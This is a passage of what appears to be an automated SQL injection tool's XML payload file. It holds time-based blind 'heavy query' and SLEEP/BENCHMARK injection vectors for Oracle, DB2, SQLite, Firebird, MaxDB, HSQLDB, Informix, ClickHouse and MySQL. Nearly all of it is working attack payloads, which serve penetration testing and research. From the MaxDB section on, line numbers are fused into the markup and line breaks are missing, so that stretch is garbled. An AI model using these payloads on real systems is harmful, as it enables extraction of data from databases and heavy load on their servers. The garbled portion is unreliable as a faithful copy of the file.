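            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>Oracle</dbms>
        </details>
    </test>

    <test>
        <title>Oracle AND time-based blind (heavy query)</title>
        <stype>5</stype>
        <level>2</level>
        <risk>2</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
        <request>
            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload>
        </request>
        <response>
            <time>[DELAYED]</time>
        </response>
        <details>
            <dbms>Oracle</dbms>
        </details>
    </test>

    <test>
        <title>Oracle OR time-based blind (heavy query)</title>
        <stype>5</stype>
        <level>2</level>
        <risk>3</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
        <request>
            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload>
        </request>
        <response>
            <time>[DELAYED]</time>
        </response>
        <details>
            <dbms>Oracle</dbms>
        </details>
    </test>

    <test>
        <title>Oracle AND time-based blind (heavy query - comment)</title>
        <stype>5</stype>
        <level>5</level>
        <risk>2</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
        <request>
            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload>
            <comment>--</comment>
        </request>
        <response>
            <time>[DELAYED]</time>
        </response>
        <details>
            <dbms>Oracle</dbms>
        </details>
    </test>

    <test>
        <title>Oracle OR time-based blind (heavy query - comment)</title>
        <stype>5</stype>
        <level>5</level>
        <risk>3</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
        <request>
            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload>
            <comment>--</comment>
        </request>
        <response>
            <time>[DELAYED]</time>
        </response>
        <details>
            <dbms>Oracle</dbms>
        </details>
    </test>

    <!-- IBM DB2 -->

    <test>
        <title>IBM DB2 AND time-based blind (heavy query)</title>
        <stype>5</stype>
        <level>3</level>
        <risk>2</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
        <request>
            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>
        </request>
        <response>
            <time>[DELAYED]</time>
        </response>
        <details>
            <dbms>IBM DB2</dbms>
        </details>
    </test>

    <test>
        <title>IBM DB2 OR time-based blind (heavy query)</title>
        <stype>5</stype>
        <level>3</level>
        <risk>3</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
        <request>
            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>
        </request>
        <response>
            <time>[DELAYED]</time>
        </response>
        <details>
            <dbms>IBM DB2</dbms>
        </details>
    </test>

    <test>
        <title>IBM DB2 AND time-based blind (heavy query - comment)</title>
        <stype>5</stype>
        <level>5</level>
        <risk>2</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
        <request>
            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>
            <comment>--</comment>
        </request>
        <response>
            <time>[DELAYED]</time>
        </response>
        <details>
            <dbms>IBM DB2</dbms>
        </details>
    </test>

    <test>
        <title>IBM DB2 OR time-based blind (heavy query - comment)</title>
        <stype>5</stype>
        <level>5</level>
        <risk>3</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
        <request>
            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>
            <comment>--</comment>
        </request>
        <response>
            <time>[DELAYED]</time>
        </response>
        <details>
            <dbms>IBM DB2</dbms>
        </details>
    </test>

    <!-- SQLite -->

    <test>
        <title>SQLite &gt; 2.0 AND time-based blind (heavy query)</title>
        <stype>5</stype>
        <level>3</level>
        <risk>2</risk>
        <clause>1,8,9</clause>
        <where>1</where>
        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
        <request>
            <payload>AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>
        </request>
        <response>
            <time>[DELAYED]</time>
        </response>
        <details>
            <dbms>SQLite</dbms>
            <dbms_version>&gt; 2.0</dbms_version>
        </details>
    </test>

    <test>
        <title>SQLite &gt; 2.0 OR time-based blind (heavy query)</title>
        <stype>5</stype>
        <level>3</level>
        <risk>3</risk>
        <clause>1,9</clause>
        <where>1</where>
        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
        <request>
            <payload>OR [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>
        </request>
        <response>
            <time>[DELAYED]</time>
        </response>
        <details>
            <dbms>SQLite</dbms>
            <dbms_version>&gt; 2.0</dbms_version>
        </details>
    </test>

    <test>
        <title>SQLite &gt; 2.0 AND time-based blind (heavy query - comment)</title>
        <stype>5</stype>
        <level>5</level>
        <risk>2</risk>
        <clause>1,9</clause>
        <where>1</where>
        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
        <request>
            <payload>AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>
            <comment>--</comment>
        </request>
        <response>
            <time>[DELAYED]</time>
        </response>
        <details>
            <dbms>SQLite</dbms>
            <dbms_version>&gt; 2.0</dbms_version>
        </details>
    </test>

    <test>
        <title>SQLite &gt; 2.0 OR time-based blind (heavy query - comment)</title>
        <stype>5</stype>
        <level>5</level>
        <risk>3</risk>
        <clause>1,9</clause>
        <where>1</where>
        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
        <request>
            <payload>OR [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>
            <comment>--</comment>
        </request>
        <response>
            <time>[DELAYED]</time>
        </response>
        <details>
            <dbms>SQLite</dbms>
            <dbms_version>&gt; 2.0</dbms_version>
        </details>
    </test>

    <!-- Firebird -->

    <test>
        <title>Firebird &gt;= 2.0 AND time-based blind (heavy query)</title>
        <stype>5</stype>
        <level>4</level>
        <risk>2</risk>
        <clause>1,9</clause>
        <where>1</where>
        <vector>AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>
        <request>
            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)</payload>
        </request>
        <response>
            <time>[DELAYED]</time>
        </response>
        <details>
            <dbms>Firebird</dbms>
            <dbms_version>&gt;= 2.0</dbms_version>
        </details>
    </test>

    <test>
        <title>Firebird &gt;= 2.0 OR time-based blind (heavy query)</title>
        <stype>5</stype>
        <level>4</level>
        <risk>3</risk>
        <clause>1,9</clause>
        <where>1</where>
        <vector>OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>
        <request>
            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)</payload>
        </request>
        <response>
            <time>[DELAYED]</time>
        </response>
        <details>
            <dbms>Firebird</dbms>
            <dbms_version>&gt;= 2.0</dbms_version>
        </details>
    </test>

    <test>
        <title>Firebird &gt;= 2.0 AND time-based blind (heavy query - comment)</title>
        <stype>5</stype>
        <level>5</level>
        <risk>2</risk>
        <clause>1,9</clause>
        <where>1</where>
        <vector>AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>
        <request>
            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)</payload>
            <comment>--</comment>
        </request>
        <response>
            <time>[DELAYED]</time>
        </response>
        <details>
            <dbms>Firebird</dbms>
            <dbms_version>&gt;= 2.0</dbms_version>
        </details>
    </test>

    <test>
        <title>Firebird &gt;= 2.0 OR time-based blind (heavy query - comment)</title>
        <stype>5</stype>
        <level>5</level>
        <risk>3</risk>
        <clause>1,9</clause>
        <where>1</where>
        <vector>OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>
        <request>
            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)</payload>
            <comment>--</comment>
        </request>
        <response>
            <time>[DELAYED]</time>
        </response>
        <details>
            <dbms>Firebird</dbms>
            <dbms_version>&gt;= 2.0</dbms_version>
        </details>
    </test>

    <!-- SAP MaxDB -->

    <test>
        <title>SAP MaxDB AND time-based blind (heavy query)</title>
        <stype>5</stype>
        <level>4</level>
        <risk>2</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
        <request>
            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)</payload>
        </request>
        <response>
            <time>[DELAYED]</time>
        </response>
        <details>
            <dbms>SAP MaxDB</dbms>
        </details>
    </test>

    <test>
        <title>SAP MaxDB OR time-based blind (heavy query)</title>
        <stype>5</stype>
        <level>4</level>
        <risk>3</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>OR [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
        <request>
            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)</payload>
        </request>
        <response>
            <time>[DELAYED]</time>
        </response>
        <details>
            <dbms>SAP MaxDB</dbms>
        </details>
    </test>

    <test>
        <title>SAP MaxDB AND time-based blind (heavy query - comment)</title>
        <stype>5</stype>
        <level>5</level>
        <risk>2</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
        <request>
            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)</payload>
            <comment>--</comment>
        </request>
        <response>
            <time>[DELAYED]</time>
        </response>
        <details>
            <dbms>SAP MaxDB</dbms>
        </details>
    </test>

    <test>
        <title>SAP MaxDB OR time-based blind (heavy query - comment)</title>
        <stype>5</stype>
        <level>5</level>
        <risk>3</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>OR [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
        <request>
            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS 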
T3)</payload>1244<comment>--</comment>1245</request>1246<response>1247<time>[DELAYED]</time>1248</response>1249<details>1250<dbms>SAP MaxDB</dbms>1251</details>1252</test>12531254<test>1255<title>HSQLDB >= 1.7.2 AND time-based blind (heavy query)</title>1256<stype>5</stype>1257<level>4</level>1258<risk>2</risk>1259<clause>1,2,3,9</clause>1260<where>1</where>1261<vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>1262<request>1263<payload>AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)</payload>1264</request>1265<response>1266<time>[SLEEPTIME]</time>1267</response>1268<details>1269<dbms>HSQLDB</dbms>1270<dbms_version>>= 1.7.2</dbms_version>1271</details>1272</test>12731274<test>1275<title>HSQLDB >= 1.7.2 OR time-based blind (heavy query)</title>1276<stype>5</stype>1277<level>4</level>1278<risk>3</risk>1279<clause>1,2,3,9</clause>1280<where>1</where>1281<vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>1282<request>1283<payload>OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)</payload>1284</request>1285<response>1286<time>[SLEEPTIME]</time>1287</response>1288<details>1289<dbms>HSQLDB</dbms>1290<dbms_version>>= 1.7.2</dbms_version>1291</details>1292</test>12931294<test>1295<title>HSQLDB >= 1.7.2 AND time-based blind (heavy query - comment)</title>1296<stype>5</stype>1297<level>5</level>1298<risk>2</risk>1299<clause>1,2,3,9</clause>1300<where>1</where>1301<vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>1302<request>1303<payload>AND 
'[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)</payload>1304<comment>--</comment>1305</request>1306<response>1307<time>[DELAYED]</time>1308</response>1309<details>1310<dbms>HSQLDB</dbms>1311<dbms_version>>= 1.7.2</dbms_version>1312</details>1313</test>13141315<test>1316<title>HSQLDB >= 1.7.2 OR time-based blind (heavy query - comment)</title>1317<stype>5</stype>1318<level>5</level>1319<risk>3</risk>1320<clause>1,2,3,9</clause>1321<where>1</where>1322<vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>1323<request>1324<payload>OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)</payload>1325<comment>--</comment>1326</request>1327<response>1328<time>[DELAYED]</time>1329</response>1330<details>1331<dbms>HSQLDB</dbms>1332<dbms_version>>= 1.7.2</dbms_version>1333</details>1334</test>13351336<test>1337<title>HSQLDB > 2.0 AND time-based blind (heavy query)</title>1338<stype>5</stype>1339<level>4</level>1340<risk>2</risk>1341<clause>1,2,3,9</clause>1342<where>1</where>1343<vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>1344<request>1345<payload>AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>1346</request>1347<response>1348<time>[SLEEPTIME]</time>1349</response>1350<details>1351<dbms>HSQLDB</dbms>1352<dbms_version>> 2.0</dbms_version>1353</details>1354</test>13551356<test>1357<title>HSQLDB > 2.0 OR time-based blind (heavy query)</title>1358<stype>5</stype>1359<level>4</level>1360<risk>3</risk>1361<clause>1,2,3,9</clause>1362<where>1</where>1363<vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' 
END</vector>1364<request>1365<payload>OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>1366</request>1367<response>1368<time>[SLEEPTIME]</time>1369</response>1370<details>1371<dbms>HSQLDB</dbms>1372<dbms_version>> 2.0</dbms_version>1373</details>1374</test>13751376<test>1377<title>HSQLDB > 2.0 AND time-based blind (heavy query - comment)</title>1378<stype>5</stype>1379<level>5</level>1380<risk>2</risk>1381<clause>1,2,3,9</clause>1382<where>1</where>1383<vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>1384<request>1385<payload>AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>1386<comment>--</comment>1387</request>1388<response>1389<time>[DELAYED]</time>1390</response>1391<details>1392<dbms>HSQLDB</dbms>1393<dbms_version>> 2.0</dbms_version>1394</details>1395</test>13961397<test>1398<title>HSQLDB > 2.0 OR time-based blind (heavy query - comment)</title>1399<stype>5</stype>1400<level>5</level>1401<risk>3</risk>1402<clause>1,2,3,9</clause>1403<where>1</where>1404<vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>1405<request>1406<payload>OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>1407<comment>--</comment>1408</request>1409<response>1410<time>[DELAYED]</time>1411</response>1412<details>1413<dbms>HSQLDB</dbms>1414<dbms_version>> 2.0</dbms_version>1415</details>1416</test>14171418<test>1419<title>Informix AND time-based blind (heavy query)</title>1420<stype>5</stype>1421<level>2</level>1422<risk>2</risk>1423<clause>1,2,3,9</clause>1424<where>1</where>1425<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] 
END)</vector>1426<request>1427<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)</payload>1428</request>1429<response>1430<time>[DELAYED]</time>1431</response>1432<details>1433<dbms>Informix</dbms>1434</details>1435</test>14361437<test>1438<title>Informix OR time-based blind (heavy query)</title>1439<stype>5</stype>1440<level>2</level>1441<risk>3</risk>1442<clause>1,2,3,9</clause>1443<where>1</where>1444<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END)</vector>1445<request>1446<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)</payload>1447</request>1448<response>1449<time>[DELAYED]</time>1450</response>1451<details>1452<dbms>Informix</dbms>1453</details>1454</test>14551456<test>1457<title>Informix AND time-based blind (heavy query - comment)</title>1458<stype>5</stype>1459<level>5</level>1460<risk>2</risk>1461<clause>1,2,3,9</clause>1462<where>1</where>1463<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END)</vector>1464<request>1465<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)</payload>1466<comment>--</comment>1467</request>1468<response>1469<time>[DELAYED]</time>1470</response>1471<details>1472<dbms>Informix</dbms>1473</details>1474</test>14751476<test>1477<title>Informix OR time-based blind (heavy query - comment)</title>1478<stype>5</stype>1479<level>5</level>1480<risk>3</risk>1481<clause>1,2,3,9</clause>1482<where>1</where>1483<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END)</vector>1484<request>1485<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)</payload>1486<comment>--</comment>1487</request>1488<response>1489<time>[DELAYED]</time>1490</response>1491<details>1492<dbms>Informix</dbms>1493</details>1494</test>14951496<test>1497<title>ClickHouse AND time-based blind (heavy 
query)</title>1498<stype>5</stype>1499<level>4</level>1500<risk>1</risk>1501<clause>1,2,3</clause>1502<where>1</where>1503<vector>AND [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(if(([INFERENCE]), 1000000, 1)))</vector>1504<request>1505<payload>AND [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(1000000))</payload>1506</request>1507<response>1508<time>[DELAYED]</time>1509</response>1510<details>1511<dbms>ClickHouse</dbms>1512</details>1513</test>15141515<!-- NOTE(review): the ClickHouse AND test above is rated risk 1 (level 4), while the other AND heavy-query tests in this part of the file are rated risk 2 and the ClickHouse OR test below is level 5; heavy queries put real load on the database server under test, so confirm the lower rating is deliberate. --><test>1516<title>ClickHouse OR time-based blind (heavy query)</title>1517<stype>5</stype>1518<level>5</level>1519<risk>3</risk>1520<clause>1,2,3</clause>1521<where>1</where>1522<vector>OR [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(if(([INFERENCE]), 1000000, 1)))</vector>1523<request>1524<payload>OR [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(1000000))</payload>1525</request>1526<response>1527<time>[DELAYED]</time>1528</response>1529<details>1530<dbms>ClickHouse</dbms>1531</details>1532</test>15331534<!-- End of time-based boolean tests -->15351536<!-- Time-based boolean tests - Numerous clauses -->1537<!-- This payload does not work with SLEEP(); the two tests below use BENCHMARK() for the delay instead. NOTE(review): both titles say "MySQL >= 5.1" but their dbms_version is ">= 5.0.12"; confirm which lower bound is intended so the reported title and the version detail agree. -->1538<test>1539<title>MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)</title>1540<stype>5</stype>1541<level>3</level>1542<risk>2</risk>1543<clause>1,2,3,4,5</clause>1544<where>1</where>1545<vector>PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])))),1)</vector>1546<request>1547<payload>PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))))),1)</payload>1548</request>1549<response>1550<time>[SLEEPTIME]</time>1551</response>1552<details>1553<dbms>MySQL</dbms>1554<dbms_version>>= 5.0.12</dbms_version>1555</details>1556</test>15571558<test>1559<title>MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE 
(EXTRACTVALUE)</title>1560<stype>5</stype>1561<level>5</level>1562<risk>2</risk>1563<clause>1,2,3,4,5</clause>1564<where>1</where>1565<vector>PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])))),1)</vector>1566<request>1567<payload>PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))))),1)</payload>1568<comment>#</comment>1569</request>1570<response>1571<time>[SLEEPTIME]</time>1572</response>1573<details>1574<dbms>MySQL</dbms>1575<dbms_version>>= 5.0.12</dbms_version>1576</details>1577</test>1578<!-- End of time-based boolean tests - Numerous clauses -->15791580<!-- Time-based boolean tests - Parameter replace -->1581<test>1582<title>MySQL >= 5.0.12 time-based blind - Parameter replace</title>1583<stype>5</stype>1584<level>2</level>1585<risk>1</risk>1586<clause>1,2,3,9</clause>1587<where>3</where>1588<vector>(CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM] END)</vector>1589<request>1590<payload>(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM] END)</payload>1591</request>1592<response>1593<time>[SLEEPTIME]</time>1594</response>1595<details>1596<dbms>MySQL</dbms>1597<dbms_version>>= 5.0.12</dbms_version>1598</details>1599</test>16001601<test>1602<title>MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)</title>1603<stype>5</stype>1604<level>3</level>1605<risk>1</risk>1606<clause>1,2,3,9</clause>1607<where>3</where>1608<vector>(SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>1609<request>1610<payload>(SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>1611</request>1612<response>1613<time>[SLEEPTIME]</time>1614</response>1615<details>1616<dbms>MySQL</dbms>1617<dbms_version>>= 5.0.12</dbms_version>1618</details>1619</test>16201621<test>1622<title>MySQL < 5.0.12 time-based blind - Parameter replace 
